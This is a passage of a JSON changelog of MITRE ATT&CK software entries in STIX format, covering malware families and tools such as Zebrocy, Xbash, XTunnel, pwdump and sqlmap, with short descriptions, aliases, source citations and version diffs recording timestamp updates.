"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "Invincea XTunnel", + "description": "Belcher, P.. (2016, July 28). Tunnel of Gov: DNC Hack and the Russian XTunnel. Retrieved August 3, 2016.", + "url": "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/" + }, + { + "source_name": "ESET Sednit Part 2", + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "XTunnel", + "Trojan.Shunnael", + "X-Tunnel", + "XAPS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:45.148000+00:00\", \"old_value\": \"2025-04-16 20:38:17.007000+00:00\"}}}", + "previous_version": "2.1" + }, + { + "type": "malware", + "id": "malware--6a92d80f-cc65-45f6-aa66-3cdea6786b3c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 13:28:47.452000+00:00", + "modified": "2025-04-25 14:43:40.462000+00:00", + "name": "Xbash", + "description": "[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0341", + "external_id": "S0341" + }, + { + "source_name": "Xbash", + "description": "(Citation: Unit42 Xbash Sept 2018)" + }, + { + "source_name": "Unit42 Xbash Sept 2018", + "description": "Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Xbash" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:40.462000+00:00\", \"old_value\": \"2025-04-16 20:38:15.191000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--a4f57468-fbd5-49e4-8476-52088220b92d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:17.288000+00:00", + "name": "Zebrocy", + "description": "[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0251", + "external_id": "S0251" + }, + { + "source_name": "Zebrocy", + "description": "(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)" + }, + { + "source_name": "Zekapab", + "description": "(Citation: CyberScoop APT28 Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Unit42 Cannon Nov 2018", + "description": "Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New \u2018Cannon\u2019 Trojan. Retrieved November 26, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" + }, + { + "source_name": "Unit42 Sofacy Dec 2018", + "description": "Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group\u2019s Global Campaign. Retrieved April 19, 2019.", + "url": "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" + }, + { + "source_name": "CISA Zebrocy Oct 2020", + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b" + }, + { + "source_name": "CyberScoop APT28 Nov 2018", + "description": "Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.", + "url": "https://www.cyberscoop.com/apt28-brexit-phishing-accenture/" + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Zebrocy", + "Zekapab" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "3.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:17.288000+00:00\", \"old_value\": \"2025-04-16 20:38:28.500000+00:00\"}}}", + "previous_version": "3.0" + }, + { + "type": "malware", + "id": "malware--552462b9-ae79-49dd-855c-5973014e157f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:20.949000+00:00", + "modified": "2025-04-25 14:43:22.946000+00:00", + "name": "Zeroaccess", + "description": "[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0027", + "external_id": "S0027" + }, + { + "source_name": "Sophos ZeroAccess", + "description": "Wyke, J. (2012, April). ZeroAccess. Retrieved July 18, 2016.", + "url": "https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:22.946000+00:00\", \"old_value\": \"2025-04-16 20:38:08.895000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:42:42.902000+00:00", + "name": "adbupd", + "description": "[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0202", + "external_id": "S0202" + }, + { + "source_name": "adbupd", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "adbupd" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:42.902000+00:00\", \"old_value\": \"2025-04-16 20:37:56.265000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-10 18:44:10.896000+00:00", + "modified": "2025-04-25 14:44:46.558000+00:00", + "name": "build_downer", + "description": "[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0471", + "external_id": "S0471" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "build_downer" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:46.558000+00:00\", \"old_value\": \"2025-04-16 20:38:36.962000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-10 19:37:49.361000+00:00", + "modified": "2025-04-25 14:43:58.304000+00:00", + "name": "down_new", + "description": " [down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0472", + "external_id": "S0472" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "down_new" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:58.304000+00:00\", \"old_value\": \"2025-04-16 20:38:21.345000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:46.890000+00:00", + "modified": "2025-04-25 14:44:13.298000+00:00", + "name": "hcdLoader", + "description": "[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0071", + "external_id": "S0071" + }, + { + "source_name": "Dell Lateral Movement", + "description": "Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.", + "url": "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "hcdLoader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:13.298000+00:00\", \"old_value\": \"2025-04-16 20:38:26.900000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--e8268361-a599-4e45-bd3f-71c8c7e700c0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:45.315000+00:00", + "modified": "2025-04-25 14:44:58.407000+00:00", + "name": "httpclient", + "description": "[httpclient](https://attack.mitre.org/software/S0068) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0068", + "external_id": "S0068" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "httpclient" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:58.407000+00:00\", \"old_value\": \"2025-04-16 20:38:40.829000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--2cfe8a26-5be7-4a09-8915-ea3d9e787513", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:56.342000+00:00", + "name": "iKitten", + "description": "[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent (Citation: objsee mac malware 2017).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0278", + "external_id": "S0278" + }, + { + "source_name": "iKitten", + "description": "(Citation: objsee mac malware 2017)." + }, + { + "source_name": "OSX/MacDownloader", + "description": "(Citation: objsee mac malware 2017)." + }, + { + "source_name": "objsee mac malware 2017", + "description": "Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "iKitten", + "OSX/MacDownloader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:56.342000+00:00\", \"old_value\": \"2025-04-16 20:38:00.655000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:03.377000+00:00", + "modified": "2025-04-25 14:45:17.053000+00:00", + "name": "ifconfig", + "description": "[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0101", + "external_id": "S0101" + }, + { + "source_name": "Wikipedia Ifconfig", + "description": "Wikipedia. (2016, January 26). ifconfig. Retrieved April 17, 2016.", + "url": "https://en.wikipedia.org/wiki/Ifconfig" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:17.053000+00:00\", \"old_value\": \"2025-04-16 20:38:51.252000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--65370d0b-3bd4-4653-8cf9-daf56f6be830", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:45:20.648000+00:00", + "name": "meek", + "description": "[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0175", + "external_id": "S0175" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "meek" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:20.648000+00:00\", \"old_value\": \"2025-04-16 20:38:52.775000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--b35068ec-107a-4266-bda8-eb7036267aea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:03.773000+00:00", + "modified": "2025-04-25 14:45:26.343000+00:00", + "name": "nbtstat", + "description": "[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0102", + "external_id": "S0102" + }, + { + "source_name": "TechNet Nbtstat", + "description": "Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc940106.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:26.343000+00:00\", \"old_value\": \"2025-04-16 20:38:55.076000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--800bdfba-6d66-480f-9f45-15845c05cb5d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:44.700000+00:00", + "modified": "2025-04-25 14:43:52.893000+00:00", + "name": "pngdowner", + "description": "[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple \"download-and-\nexecute\" utility. (Citation: CrowdStrike Putter Panda)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0067", + "external_id": "S0067" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "pngdowner" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:52.893000+00:00\", \"old_value\": \"2025-04-16 20:38:20.185000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--9de2308e-7bed-43a3-8e58-f194b3586700", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:13.051000+00:00", + "modified": "2025-04-25 14:45:24.744000+00:00", + "name": "pwdump", + "description": "[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0006", + "external_id": "S0006" + }, + { + "source_name": "Wikipedia pwdump", + "description": "Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.", + "url": "https://en.wikipedia.org/wiki/Pwdump" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "pwdump" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:24.744000+00:00\", \"old_value\": \"2025-04-16 20:38:54.480000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--33b9e38f-103c-412d-bdcf-904a91fff1e4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:16.528000+00:00", + "name": "spwebmember", + "description": "[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0227", + "external_id": "S0227" + }, + { + "source_name": "spwebmember", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "NCC Group APT15 Alive and Strong", + "description": "Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.", + "url": "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "spwebmember" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:16.528000+00:00\", \"old_value\": \"2025-04-16 20:38:51.100000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:24.383000+00:00", + "name": "sqlmap", + "description": "[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0225", + "external_id": "S0225" + }, + { + "source_name": "sqlmap Introduction", + "description": "Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.", + "url": "http://sqlmap.org/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, 